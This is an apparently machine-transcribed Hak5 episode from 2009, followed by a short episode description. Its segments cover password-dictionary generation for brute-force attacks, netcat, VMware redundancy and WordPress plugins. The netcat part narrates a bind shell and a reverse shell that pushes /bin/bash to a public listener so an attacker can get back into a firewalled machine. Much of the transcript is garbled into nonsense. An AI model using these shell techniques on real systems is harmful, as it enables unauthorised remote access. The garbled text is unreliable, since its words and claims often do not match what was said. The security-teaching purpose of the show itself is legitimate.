" Poland and all the pet's name Kirby. I a company in -- Do and add some special stuff yes we can do you really isn't bolts it. -- The browns. Yeah it is that all that's all -- yet to free you know there and he's involved and on sports and learn what or britney's. Actions. -- and then finally. This commerce all of you can go so. This -- is just getting the characters. We're not in his special characters and let us your random numbers at the end of elements to -- narrowed. And and check this out so it creates this picture here -- I just open up and and a Nat. Router. Out. Apple and and every guy out you know is your password camera -- last -- when it. Is is it. Some -- 1980 to five and I don't messiah thing and I."
" Well no seriously okay because -- you know all of this you probably try every single one of those aren't you know now we have nothing to thousands of these try and I think that's on it your domino it did the user that you're trying to break into is dumb enough. If they're not gonna have 92000. Variations in their brain and it's the quick sort. Systems administrator but you know the deal right go to help the personal computer and you're like I just did you log. Right and I even say I don't want your password just go and law again I -- look away once I remember right. This is like. It's Jordan 1993. Why was it two or three that was her son's -- the year human born right okay. But you are when entering this and you already know. And in Canada your attacker. Okay you party will already know all that stuff about Apple why -- it Jordan 1993 the first thing you're gonna try. Yes. It connects the cards or don't users are that smart the good and yeah Jordan now this but it's the -- and just say it. Now this. Is the lights days get eaten those throat and there that you bought at a time. -- Would. -- guys know that we are on a whole plethora. Different. You know there's -- week."
" Yes we and -- didn't read."
" There's other places and hurt. Somebody -- varieties and I think we would get on iTunes is before the iPod."
" If you have not realizing you're not watching this needs to enhance the capability now HD we are in HD's and -- and subscribe to the HCR's as -- warm -- the iTunes. And you got to -- on YouTube and TiVo and Nero and all of those are at the top five dot org well feelings there it is hard to get us. We as far as TiVo you have to have a TiVo connected box -- entry guys are written in its. You spread the techno lust and we're gonna contest that yet does it involve technolust yes wouldn't call the rash no good. I have to think about -- I really do that we're given and you say we'll do that we'll talk about that later anyway I still coming up later and so that's fallen -- virtualization anytime were pressed up. You guys -- the kitchen and we're gonna go find out a little bit about kiddies and Internet. Actually -- its back with money over here."
" So today I want to talk about netcat. Which is kind of like."
" A TCP/IP, UDP. Read write who it's an open source tool it's cross platform. And this is one of these things I just want to get through this stuff because it's a real fundamental thing. That we're going to be expanding on a little bit later with sort of exploits and and stuff like that. It's what what can be considered a Swiss army knife of TCP/IP or at least that's what the developers call it. And we are going to just learn by example here -- want to see some nifty things you can do when you're you know sending. TCP or UDP or listening to TCP or UDP and just reading and writing those packets. Over the wire I'm on with -- so let's take a look at these quick examples and I think you're really gonna rock how powerful this tool is. So first of all. If we can. Go ahead and and read write TCP let's go ahead and connect to an HTTP server just like we would look like Tom and a web -- something like that. In a fire -- here and BackTrack 4 beta Remote-Exploit awesome stuff. And it's just nc as the command V for -- verbose and I'm going to go to 101031. Which is a web server on port eighty. And you'll see that I have indeed connected and it knows it's a web server WWW. And I and a right in here and slash HTTP. Slash one point one right. When I do that I get a bad request but what's important here. Is that I actually get header. From you know the band error. This of this HTTP server can tell that it's an Apache two point two point eleven server that's what's -- is like -- grabbing seeking justice tool. To say like here using an app or something you found. Hey. You know something interesting you could go. And use this to kind of query that service whether it's like an HTTP server an FTP server assets whenever right. And in many cases you can get version numbers which are important for when you want to maybe look there's an exploit for that something. 
We can also use that as a rudimentary chat so what I'm gonna do here since it's a read and write whole kind of envisioned as a client and server cool. I'm going to be showing you a couple of examples here with my machine and BackTrack 3 and BackTrack 4 and also my Vista machine upstairs so like I said netcat is cross platform so happy here and Windows and we're gonna do is demonstrate how we can use it to do rudimentary chat. -- an issue netcat -- V for verbose and yet -- LP for listen on port one needs 1234. -- the Windows machine it just listening on TCP port 12 before or whatever. It it's it's real raw TCP. It's beautiful so we're going to come back to the Linux side. And an issue -- hat technique and I'm gonna give the IP 1010 31. And port 1234. And we've connected. But there's nothing really going on we come back here look at -- to school this over take a look at our. A Windows side and we don't have anything interesting. Until I typed hello there we go right so. You know we can have a very rudimentary chat if if you had recently -- and it -- my little reminiscent. But there's a basic idea of how does working -- and it's like raw serial connection but it's at TCP UDP. So -- that give you an idea of -- so we can send data while with some interesting pipes we can actually send some files so let's go ahead and create a file here. And send it. To our friend the Windows machine and this is something that you could use if you want to. Points instance want birds to some real quick easy way didn't have -- set up to SCP a file over we're. FTP it to -- email or whatever you just get a file across networked real simple like this. So. Word that what we're gonna go ahead and do is listen on. Are certain what will consider our server side so on the witness and indeed attacked -- And listen on port 1234 again. And this time you can see I am going to give it a little walk there. 
And in fact that moment now we're gonna it a file to send it so go ahead and touch Tina here. And -- act oh. Is smoke and two Tina -- Right and now we have but what does -- make sure it's there. Great it's there so I'm going to send that file over to the Windows machine using netcat now I just -- The and and I'm gonna give it the port answered B can and then port which just and and those 31. On port 1234. And now on any given to walk the other direction and saying send this file into you and that file of course is. Press and are actually refuse beautiful because we are not listening. Okay so let's come back over here and say ten. Answer -- and now we're listening and we're expecting whatever data that we get through there to be pumped. To the -- in effect on the Windows side we run this again on the Linux side there are. You went on here as we don't get late night not like you home W again has a beautiful little status indicator when it like a pilot transferred we get no information like that. Since it's long and it's done this and you know break out of it and make sure it's there so I'm going to TAR Tina. There it is and I'm going to type. And it's not there outside mean -- he is that. Now there are two other interesting examples and I want to show you become a powerful -- I can really get and then. Later on we'll talk about some other amazing stuff you can do the first I want to do is show you guys how you can set up. What's called a cotton and -- direction we're going to bind it a shell or a program or anything like that. To netcat just as we did this file. So. In this instance what I'm going to do on the Windows side. Is I'm going to set up -- had to listen. But we're also going to have -- bind the CMD. The idea exe or the command prompt so on the Windows side here it's nc tack. The LDP. For listen for those on port. 1234. And Tak EC indeed -- okay so that's listening. For connection. 
Two or 1234 and when it does it's going to bind that to the command prompt. So back over here Linux and see from -- Kat -- B and I'm going it's a and attend -- 31. And again 1234. Open. And just moment here. There yep you can see I have to -- on the -- tools I can say it now type Tina. And there we go. So. This is a great way to you know quickly set up a shell and you don't have this stage or some other nefarious -- so that -- going to be getting into later. Now the thing about this is is seem like one of these machines it's like behind firewall or something like that maybe it was machine on the inside of about corporate network right and we can't just. Port forward Nilly -- we -- we're not public facing and we would like to get back to that machine later from you now that they. The convenience of a packed house for instance well. We can easily. Just listen on an important what we can do is do the reverse of that. We can send the shell to a listener so in that and simple we're gonna do is set up. The Windows -- here to be the listener and for that nc dash LDP. 1234 so we're listening for votes on port 1234. And let's pretend let's go back over the Linux side here let's pretend that this machine is. The machine that's behind the firewall we want to send it. Our. -- so in that instance just like we're doing before with the tacky of CD we're going to send it in bash that'll be. And see attack the and and and and that and a -- 31 because that is public facing. Or in -- instance example an attack -- slash bin. Slash bash which is the equivalent proceed in the and acts. And area would come over here and you don't really see a whole lot just let's just that we're connected. But if we issue -- here there we go we actually have a directory listing. And you know we can. Can run top we can. You know run whatever. And we are on that machine. 
Now there's a whole lot of other interesting things you can do with -- has an interest in what countries have you do with it so definitely hit me up feedback at Hak5 dot org that. And actually have a couple of user-submitted ones here -- some some crazy ideas that you guys. Do cabins on the rights to tell me that he actually uses this to tail log files lot of sense to run process someone's server. You need to go to another computer's monitor it. Without have to -- like the NC session. Up precious Roy mentioned that you can actually use this to DD or to do a disk image of hard drive from one computer to another computer. Over the Internet and I'll have links to to an article on how to do that show notes. Joey Adams. Says that this is a great way to import -- direction which we -- be talking about next week and then puts plastic or his email actually came from domain administrator so he does -- letting. And it. He mentions that you cannot use this is -- like we showed you with the port eighty connecting to -- web server. What he likes to send a user agent Internet Explorer 22. Just really screw with people that check -- their server logs -- the referer from like lemon party years like that. Which is. Quite mean anyway. -- that -- awesome tool open source highly recommend check it out -- the Mac as whatever. Have links -- on ways to do this and I want to let you know that we are going to be dealing. The some stuff that involves litter on the right now and then go and and -- and the we have virtualization coming up with and before them let's find out what's going on this week's LAN party."
" Right guys get ready I know you've been waiting for it this -- we airplanes. Goldeneye stories yes that's right. We're gonna be playing over and -- dot Hak5 dot org highs Saturday may thirtieth at the end of this might get prepared. And if you want to check out any cool games and local Lan parties say -- excited about. You can go over to Hak5 land fast Squarespace dot com and sign up and vote for your favorite game. Hey -- has a little bit of information for us about placing."
" That's right want to thank Squarespace for sponsoring LAN party and I'm here on our LAN party page -- nifty feature it looks like I'm just on the page but get this extra button here and posts an entry and I can do just that. Fill in my details here. What's nice and get a rich text editor and it's kind of like a -- he -- easy buttons here that rich media like an added. Image here from the direct pure out. And what's nice is right there with then why copy I can go ahead and grab these little selection boxes and resize my image. Right from within my documents -- it and a volunteer community -- and take a look at how. Versus just a powerful you can get your Squarespace plan. Over Squarespace dot com use coupon code Hak5 and get 10% off the life of your service."
" Thank you Darren and up next we have some. Awesome information from -- about virtualization and over at his office was -- join us."
" Our -- so we are here back in my lovely office in Williamsburg Virginia for part two of our virtualization segment. Or intro or series if you want -- Got a lot of good feedback about the first episode that we did which was basically just a intro into the cost savings associated with virtualization. Today we're gonna do is red tape that's one more step further and instead of going into the cost benefit from going into the a disaster recovery or high availability. Women -- Dusan to show you some best practices. -- implementing a multi-host. With SAN connected storage. Wore like a cluster or so someone and so port. So let's go ahead and take a look at the white -- here. -- to do is -- and drop the best practices for networking. And storage so let's start with our two -- would say we've got -- to host virtual. Machines like the 900 that I mentioned yesterday. And I only said that I have one but. We don't have the money for a second one. So go ahead and start with host number one. And host number two. And these are both running. VMware ESX three point five. So by themselves they would be you know great standalone virtual machine hosts however what we want to do is we want to actually utilize. A third box. This is gonna be our master controller or Virtual Center server. Virtual Center's gonna connect these two boxes. It's gonna say hey I now -- two hosts in this. Landscape if you will. And from there we can actually manage all of the virtual machines from. Virtual Center server instead of logging into -- one -- it's a certain set of virtual machines or box to manage a you know another -- of virtual machines so we've got Virtual Center are all hooked up now we need to hook up. Networking and we do that while best practices state that you should have fully redundant. You know paths to. Each of your hosts. So now we've got two. Network switches. Intact but we do is. You've got you know your interconnectivity. 
In coming through so one to hear once there once a year one there. So now if one of these switches goes down. Switch two kicks back in and does its thing now networking is a lot easier in the new version of VMware Infrastructure which now called vSphere. Horrible name great product. Which makes it setting up a data center. Network a lot easier. I don't have access to the beta but rest assured as soon as we do get access to it I'll -- and much as -- Ohio exactly setup networking. The other things you wanna do is you want to have a another set of switches. These will be your. iSCSI switches won't mention broke that don't think we're using blue anymore but -- black. So now we've got two more -- here."
" The tank and we've got our."
" Our -- here obviously. Replicating SAN is a little costly -- need to get into the EMC. You know high end people logic actually replicate SAN. Stored so we're gonna do is we're actually gonna go ahead and you just like we did -- Yes so this comes down here. And then this one comes down here in this one is here and this from those here. TC aware trying to. To implement yeah this is gets a little crazy however when you think about it in terms of okay. I have one point of failure. Not gonna point one point there point one point so this really becomes then your single. Point of failure for you know hardware wise now we can try and you know. Alleviate that by going to see a a properly architected RAID 50 which is basically in the one. Is a group of -- three in my case three drives in one spindle. Three drives another spindle. Okay so these would each be RAID 5. In fact. And then once we have all these RAID 5 created. We go ahead. Actually that's wrong. We actually -- these. To a RAID. There are intact so. One of these each one of these is a RAID 5 -- Which makes rebuilding should one of these drives fail. Quicker occasional at the rebuild say twelve terabyte -- And also you get the speed of striping across. RAID 5 -- so you've you've kind of mitigated the problem of having a centralized storage solution. Okay now the nice thing about VMware. ESX. Or actually should say Virtual Center is now bolt on applications that they have you can have. DRS. Which is I believe dynamic resource sharing. Where it'll monitor if box one is at 80%. And box two is at 20%. You can set a threshold of I would only want these boxes to be you know peak utilization at 60% that's what. View it dot VMware Virtual Center will do is it will live migrate. Using storage would they called VMotion and all these products have been -- so bear with me. It'll migrate a certain number of the hands. Over here to balance wow. To your. 
-- To your specifications on the other nice thing is like I said with you've got down. VMotion. And you can go ahead and live migrate with no down time. From this -- say you have hardware failure one of your RAM sticks is dead or you know you've got upgrades that you need to do to the BIOS results some funky thing. You can actually push everything over with. Like minimal interruption in service we're talking less than. Five seconds. Where you could push all the virtual machines and then you could safely. You know bring this machine down or. You know upgrade it and then from here push everything over to the same to this one. So here is the ideal. Set up for your VMware implementation. SAN. Redundant switches. Redundant switches for your network. Redundant controllers. And if you want it to you can even have multiple Virtual Center controllers. Now then I guess said I got a lot of good comments about my set up my set up is. Like a -- beginning of last week not ideal single point failure and server. You know SAN space is an an issue not only got one network. This is a very costly set up not only due to you know licensing fees what actually all the hardware that you're gonna need to purchase however. This is probably the easiest ways to do high availability which is exactly what we've got set up here. Dynamic resource sharing. Think about you know of that when you're implementing a solution for us he's a software which is. Millions of dollars in in which might -- these cases this AP so. You know -- you know however much it is -- 12550000. Dollars in in implementation like this you can actually get away with. And your CapEx budgets are tight. But. I really think if you haven't already. Go ahead should mean email with your questions matter Hak5 or post month forums. -- but if you have any questions about you know how to architect virtualization. I'm probably I'm sure I'm probably missed something here but. 
-- now me I'll be sure to answer it on an upcoming episode when we actually showed you how to. Set these things up so for more on this head on over to -- on dot com or. --"
" Our guys once again it's time to tell you guys about trivia or so the walk is called now first of all we have to talk about that monkey contest. The winner is announced right now and it's things. Spike CD you -- we went through a lot of is awesome submissions everybody did a great job I if I can give you a Little League trophy all what. But we're actually getting -- CP an epic sock monkey Amazon's that it is very -- like this pictures. From. -- There -- And that's what a legitimate -- coding challenges going on. You can get all the details. -- to challenge PHP. Two Gmail pads and a lot of fun -- so RTC's great submissions. They're still coming days to get in on it so make sure you check that out. The winner of such contests announced next week and -- 512 will win. The awesome if you reference book by -- and it is really enjoy that. And before we get to this week's. --"
" thank you so much for sponsoring this episode of tax side. If you want to make an impact online godaddy.com has what you need dot com names as low as dollars 99 plus world class hosting -- web site builders and much more. In that he is could hack one that is JK one -- can get 10% off your order. Some restrictions apply see the website for details and get your piece of the Internet and godaddy.com. Darren take --"
" Alright so here it is this week's. Contest. Saying he is actually in Easter egg hunt. So I think you guys are really going to enjoy this pixel what you already learned in this episode and apply it RTT."
" Dot Hak5. Dot org that's your only -- are right. And next week we'll talk about it and do some stuff and basically you get in on this Easter egg hunt here and find the answer. And you'll find how to submit it when you find the answer. You will be eligible to win not only a lock of matte hair but a deluxe Hak5 hack packs and -- months. So anyway I hope you guys get in on that and right now and you can get tackled British and find out about word press -- to -- your blog."
" So this past week I have been travelling all over the word press -- looking for my favorite one again so I went through hundreds of them. And I found us what would you would column. My top ten. The first one want to talk about is twit me it basically takes your blog post and transfers it straight over to Twitter. And I have up example moderate hearing just -- that this is a test an automatic medically types and whatever you want it to and it gives a link over to use. York luck. The second one I want to talk about. Is called socialite -- does pretty much the exact same thing except that works for FaceBook MySpace and Twitter. I personally like twit anymore for Twitter so I just you socialite bespoke. In MySpace so I can get all my blog post transfer Everett all sorts of different social networks at the same exact time. Sociable is pretty cool this one actually gives you. A whole bunch -- share this icons and you have 99 different ones to choose from you can choose your favorite wants to link to you. Mary -- that's all you need enough. The next one I found out about what's called mobile press this and I can actually show you on my phone it actually made it might. Log into a mobile blog. So it shows up perfectly clean and clear for anybody who wants to go on my blog on there. On their cell phones except for some reason it doesn't work from Blackberry it just works on iphones and palms. From what I know. My favorite line is can't resize at upload -- This one basically takes your images that you upload -- blog to any of your new entries. And automatically turns Bennett in two years defiant width and height and nothing over the maximum that you issues so on my site I made all of my turn. Turn out to be less than 500. No more than 500 or -- it'll copy everything on the side -- here you can see. This picture actually is about at a now 1024 by 768 or something and and I made it. A whole 500 pixels wide. The next plug in that I've found is called WP security scan. 
It scans your word -- installation through security vulnerabilities. In it suggests corrective action so on mine you can see I have a certain version and I have the latest stable version. I don't have any. I have a table prefix that is not WP. In at stop at the bottom it says that I have admin. An admin users that still exist I should probably fix that and it gives me some ideas on how to fix it right click the button. It says how to change WordPress admin username so it gives me ideas on how to fix that. Okay WordPress Backup that's really good tool for pretty much everybody to have it backs up pretty much your entire database of your blog and automatically emailed it to whatever email address that you want it to you. I decided to make mine emailed me. Once a week with all of my database files and one zip file it's a great program for anybody who's worried about losing their information on their website. WP-Ban is one of my favorites. I've used it since I first started off with my blog and it's very very helpful if you have anybody go into your site that spans the latter says -- thing means yet. Whatever it ends IP incipient IP ranges -- names and referrer URLs that try to visit your blog. You can even redirected to go to other web sites so I have one of mine going to. I think it's this. I -- a new image. It works really well so I definitely. What you get to -- it right. The very last one that I want to tell you about is called pixel stats. Pixels stacks is basically basically very minimal. Google Analytics for your website if you're not really into the whole thing in you know your interest in on how many views you have. Your interest in and a couple of those things but you don't really care about the analytics -- keywords that people actually -- then it -- to your blog. You contrivance pixels that's just gives you total views you need to use unique visitors just a couple of things that here. A little interested but not that much. If you guys have any interesting.
Plugin or even widgets for your blogs that you want to check out definitely hit me up that feedback@hak5.org and tell me what you think."
" I think we're going to end the show now. -- go grab the guys. Hey guys that absent that an -- by. The buttons and."
" Rock and and until nine -- a huge fan of it as he is this next to stroh's and."
" It's the only download information please think before we talk about that."
" It is -- all that stuff."
" I want to let everybody knows that. Dean Klein is enemies -- they are the largest online video game rental service and offer choice of over 6000 new and classic titles -- all councils and elves which plants are you 15951. Game by members can rent one to four games at a time and keep them for as long. As they like you can also purchase a game you fall in love with it adults into the box and manual. Pornography. And on over to gain slide dot com slash Hak5 to get. Two week free trial membership -- line dot com."
" Slash -- I can't see it's. All Italy where it or just finishing that's great sounds the rent in China that they had to -- content for the hawks but."
" It's a -- game but it."
" Did send it back isn't short your plan leopard gays and our bill it's really mentions the night before so I'm always."
" Unhappy Miami's. I tell you -- abouts thinker yeah. We just watched the newest episode of Digg Reel last week it was episode number 67. -- talk to you Mythbusters."
" Yeah that's right -- but it did not have any video from the the one with the rockets smash is it's under the canals and it it."
" Flatten the -- it was so cool and what you guys gotta check it out Revision 3 dot plastic real. It's. My. Oh yeah and Andrew got zapped place. Simple it -- Clinton about it. With the yeah."
" Mr. you've got him. And Texas not -- Yes I'm checking out -- nine point four just in in this accident netbook -- next question is specifically for these talk with you so love that. And it's -- both of -- things look in one. The interface is interesting here we can just like drill down here and it's like all of these little menus and what's what's kind of -- about is when you can these programs just chill up here in the top left. And everything's like -- full screen. So oh you know. Makes it. Well. For doing one thing at a time but. Yeah I'm -- resolution on these little tiny. Bastards. It. -- Thanks it's an awesome firmware bias on. Yet just sticking to BackTrack for -- years. And it's. -- Yes we asked about we can talk about getting career -- Is it only -- an ass off. For example now actually I I'll give you the list and certifications and degrees because it's really about the letters after. -- I've actually had -- hundred prefix YouTube because it makes. As an awesome blog post it's immediately along with this flash worked in and it is an excuse our industry. We'll know allocate your writer he doesn't it in a year -- completely. It is it is but here already. And you're looking for something he he actually gave a presentation did you stack is -- video it's about how to go from -- career and eighty hours or less so now president and interest that stuff and creates an expert."
" To remember guys we've got the new Hak5 website launching in the next. We episode next next week. Along with the new story that there has promised a populated with all brand new goodies I know all in there and our. Working -- and it a promotional video for you guys that you can. The really excited about -- and there were one sure who got so -- so you can honestly -- which that's true and -- Hak5 dot org slash stickers to support the show remember iTunes TiVo Miro."
" You two digit technolust are assessed weekly and we like it was the first world for the coming out. There's a reason for that this wouldn't answer -- that and also share your techno clubs. All right guys you see you next week's meantime upon -- it."
" It's."
" Like Leo how are you the girl and that's and we'll get visual basic. All going to call coming. Being used."
" That's -- week."
Started discussion: April 29, 2009 @ 11:00am GMT
Darren shows off some nifty tricks for Netcat and a targeted brute force attack dictionary generator. Matt continues his series on Virtualization with redundancy and Shannon pimps the blog with her WordPress plugin picks. Plus the results of our Monkey Contest, the Code Challenge and this week's Easter egg hunt ;)
Matt seemed to be in a bad mood, though....